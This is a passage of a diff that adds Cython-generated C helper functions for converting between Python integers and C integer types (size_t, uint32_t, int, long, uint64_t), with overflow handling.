CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((size_t) 1) << (sizeof(size_t) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (size_t) -1; + } + } else { + size_t val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (size_t) -1; + val = __Pyx_PyInt_As_size_t(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to size_t"); + return (size_t) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to size_t"); + return (size_t) -1; +} + +/* CIntToPy */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_uint32_t(uint32_t value) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const uint32_t neg_one = (uint32_t) -1, const_zero = (uint32_t) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (is_unsigned) { + if (sizeof(uint32_t) < sizeof(long)) { + return PyInt_FromLong((long) value); + } else if (sizeof(uint32_t) <= sizeof(unsigned long)) { + return PyLong_FromUnsignedLong((unsigned long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(uint32_t) <= sizeof(unsigned PY_LONG_LONG)) { + return PyLong_FromUnsignedLongLong((unsigned PY_LONG_LONG) value); +#endif + } + } else { + if (sizeof(uint32_t) <= sizeof(long)) { + return PyInt_FromLong((long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(uint32_t) <= sizeof(PY_LONG_LONG)) { + return PyLong_FromLongLong((PY_LONG_LONG) value); +#endif + } + } + { + int one = 1; int little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&value; + return _PyLong_FromByteArray(bytes, sizeof(uint32_t), + little, !is_unsigned); + } +} + +/* CIntToPy */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_long(long value) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const long neg_one = (long) -1, const_zero = (long) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (is_unsigned) { + if (sizeof(long) < sizeof(long)) { + return PyInt_FromLong((long) value); + } else if (sizeof(long) <= sizeof(unsigned long)) { + return PyLong_FromUnsignedLong((unsigned long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(long) <= sizeof(unsigned PY_LONG_LONG)) { + return PyLong_FromUnsignedLongLong((unsigned PY_LONG_LONG) value); +#endif + } + } else { + if (sizeof(long) <= sizeof(long)) { + return PyInt_FromLong((long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(long) <= sizeof(PY_LONG_LONG)) { + return PyLong_FromLongLong((PY_LONG_LONG) value); +#endif + } + } + { + int one = 1; int little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&value; + return _PyLong_FromByteArray(bytes, sizeof(long), + little, !is_unsigned); + } +} + +/* CIntFromPy */ +static CYTHON_INLINE uint32_t __Pyx_PyInt_As_uint32_t(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const uint32_t neg_one = (uint32_t) -1, const_zero = (uint32_t) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(uint32_t) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(uint32_t, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (uint32_t) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(uint32_t, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(uint32_t) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint32_t, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint32_t) >= 2 * PyLong_SHIFT)) { + return (uint32_t) (((((uint32_t)digits[1]) << PyLong_SHIFT) | (uint32_t)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(uint32_t) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint32_t, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint32_t) >= 3 * PyLong_SHIFT)) { + return (uint32_t) (((((((uint32_t)digits[2]) << PyLong_SHIFT) | (uint32_t)digits[1]) << PyLong_SHIFT) | (uint32_t)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(uint32_t) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint32_t, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint32_t) >= 4 * PyLong_SHIFT)) { + return (uint32_t) (((((((((uint32_t)digits[3]) << PyLong_SHIFT) | (uint32_t)digits[2]) << PyLong_SHIFT) | (uint32_t)digits[1]) << PyLong_SHIFT) | (uint32_t)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (uint32_t) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(uint32_t) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(uint32_t, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(uint32_t) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(uint32_t, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(uint32_t, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(uint32_t) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint32_t, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint32_t) - 1 > 2 * PyLong_SHIFT)) { + return (uint32_t) (((uint32_t)-1)*(((((uint32_t)digits[1]) << PyLong_SHIFT) | (uint32_t)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(uint32_t) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint32_t, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint32_t) - 1 > 2 * PyLong_SHIFT)) { + return (uint32_t) ((((((uint32_t)digits[1]) << PyLong_SHIFT) | (uint32_t)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(uint32_t) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint32_t, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint32_t) - 1 > 3 * PyLong_SHIFT)) { + return (uint32_t) (((uint32_t)-1)*(((((((uint32_t)digits[2]) << PyLong_SHIFT) | (uint32_t)digits[1]) << PyLong_SHIFT) | (uint32_t)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(uint32_t) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint32_t, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint32_t) - 1 > 3 * PyLong_SHIFT)) { + return (uint32_t) ((((((((uint32_t)digits[2]) << PyLong_SHIFT) | (uint32_t)digits[1]) << PyLong_SHIFT) | (uint32_t)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(uint32_t) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint32_t, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint32_t) - 1 > 4 * PyLong_SHIFT)) { + return (uint32_t) (((uint32_t)-1)*(((((((((uint32_t)digits[3]) << PyLong_SHIFT) | (uint32_t)digits[2]) << PyLong_SHIFT) | (uint32_t)digits[1]) << PyLong_SHIFT) | (uint32_t)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(uint32_t) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(uint32_t, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(uint32_t) - 1 > 4 * PyLong_SHIFT)) { + return (uint32_t) ((((((((((uint32_t)digits[3]) << PyLong_SHIFT) | (uint32_t)digits[2]) << PyLong_SHIFT) | (uint32_t)digits[1]) << PyLong_SHIFT) | (uint32_t)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(uint32_t) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(uint32_t, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(uint32_t) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(uint32_t, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + uint32_t val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (uint32_t) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (uint32_t) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (uint32_t) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (uint32_t) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (uint32_t) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(uint32_t) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((uint32_t) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(uint32_t) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((uint32_t) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((uint32_t) 1) << (sizeof(uint32_t) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (uint32_t) -1; + } + } else { + uint32_t val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (uint32_t) -1; + val = __Pyx_PyInt_As_uint32_t(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to uint32_t"); + return (uint32_t) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to uint32_t"); + return (uint32_t) -1; +} + +/* CIntFromPy */ +static CYTHON_INLINE int __Pyx_PyInt_As_int(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const int neg_one = (int) -1, const_zero = (int) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(int) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(int, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (int) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(int, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(int) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 2 * PyLong_SHIFT)) { + return (int) (((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + case 3: + if ((8 * sizeof(int) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 3 * PyLong_SHIFT)) { + return (int) (((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + case 4: + if ((8 * sizeof(int) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) >= 4 * PyLong_SHIFT)) { + return (int) (((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0])); + } + } + break; + } + } +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX < 0x030C00A7 + if (unlikely(Py_SIZE(x) < 0)) { + goto raise_neg_overflow; + } +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (int) -1; + if (unlikely(result == 1)) + goto raise_neg_overflow; + } +#endif + if ((sizeof(int) <= sizeof(unsigned long))) { + __PYX_VERIFY_RETURN_INT_EXC(int, unsigned long, PyLong_AsUnsignedLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(int) <= sizeof(unsigned PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(int, unsigned PY_LONG_LONG, PyLong_AsUnsignedLongLong(x)) +#endif + } + } else { +#if CYTHON_USE_PYLONG_INTERNALS + if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(int, __Pyx_compact_pylong, __Pyx_PyLong_CompactValue(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_SignedDigitCount(x)) { + case -2: + if ((8 * sizeof(int) - 1 > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 2: + if ((8 * sizeof(int) > 1 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 2 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + return (int) ((((((int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case -3: + if ((8 * sizeof(int) - 1 > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 3: + if ((8 * sizeof(int) > 2 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 3 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + return (int) ((((((((int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case -4: + if ((8 * sizeof(int) - 1 > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, long, -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 4 * PyLong_SHIFT)) { + return (int) (((int)-1)*(((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + case 4: + if ((8 * sizeof(int) > 3 * PyLong_SHIFT)) { + if ((8 * sizeof(unsigned long) > 4 * PyLong_SHIFT)) { + __PYX_VERIFY_RETURN_INT(int, unsigned long, (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0]))) + } else if ((8 * sizeof(int) - 1 > 4 * PyLong_SHIFT)) { + return (int) ((((((((((int)digits[3]) << PyLong_SHIFT) | (int)digits[2]) << PyLong_SHIFT) | (int)digits[1]) << PyLong_SHIFT) | (int)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(int) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(int, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(int) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(int, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + int val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (int) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (int) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (int) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (int) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (int) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(int) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((int) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(int) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((int) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((int) 1) << (sizeof(int) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (int) -1; + } + } else { + int val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (int) -1; + val = __Pyx_PyInt_As_int(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to int"); + return (int) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to int"); + return (int) -1; +} + +/* CIntToPy */ +static CYTHON_INLINE PyObject* __Pyx_PyInt_From_uint64_t(uint64_t value) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const uint64_t neg_one = (uint64_t) -1, const_zero = (uint64_t) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (is_unsigned) { + if (sizeof(uint64_t) < sizeof(long)) { + return PyInt_FromLong((long) value); + } else if (sizeof(uint64_t) <= sizeof(unsigned long)) { + return PyLong_FromUnsignedLong((unsigned long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(uint64_t) <= sizeof(unsigned PY_LONG_LONG)) { + return PyLong_FromUnsignedLongLong((unsigned PY_LONG_LONG) value); +#endif + } + } else { + if (sizeof(uint64_t) <= sizeof(long)) { + return PyInt_FromLong((long) value); +#ifdef HAVE_LONG_LONG + } else if (sizeof(uint64_t) <= sizeof(PY_LONG_LONG)) { + return PyLong_FromLongLong((PY_LONG_LONG) value); +#endif + } + } + { + int one = 1; int little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&value; + return _PyLong_FromByteArray(bytes, sizeof(uint64_t), + little, !is_unsigned); + } +} + +/* FormatTypeName */ +#if CYTHON_COMPILING_IN_LIMITED_API +static __Pyx_TypeName +__Pyx_PyType_GetName(PyTypeObject* tp) +{ + PyObject *name = __Pyx_PyObject_GetAttrStr((PyObject *)tp, + __pyx_n_s_name); + if (unlikely(name == NULL) || unlikely(!PyUnicode_Check(name))) { + PyErr_Clear(); + Py_XSETREF(name, __Pyx_NewRef(__pyx_n_s__18)); + } + return name; +} +#endif + +/* CIntFromPy */ +static CYTHON_INLINE long __Pyx_PyInt_As_long(PyObject *x) { +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const long neg_one = (long) -1, const_zero = (long) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x))) { + if ((sizeof(long) < sizeof(long))) { + __PYX_VERIFY_RETURN_INT(long, long, PyInt_AS_LONG(x)) + } else { + long val = PyInt_AS_LONG(x); + if (is_unsigned && unlikely(val < 0)) { + goto raise_neg_overflow; + } + return (long) val; + } + } else +#endif + if (likely(PyLong_Check(x))) { + if (is_unsigned) { +#if CYTHON_USE_PYLONG_INTERNALS + if (unlikely(__Pyx_PyLong_IsNeg(x))) { + goto raise_neg_overflow; + } else if (__Pyx_PyLong_IsCompact(x)) { + __PYX_VERIFY_RETURN_INT(long, __Pyx_compact_upylong, __Pyx_PyLong_CompactValueUnsigned(x)) + } else { + const digit* digits = __Pyx_PyLong_Digits(x); + assert(__Pyx_PyLong_DigitCount(x) > 1); + switch (__Pyx_PyLong_DigitCount(x)) { + case 2: + if ((8 * sizeof(long) 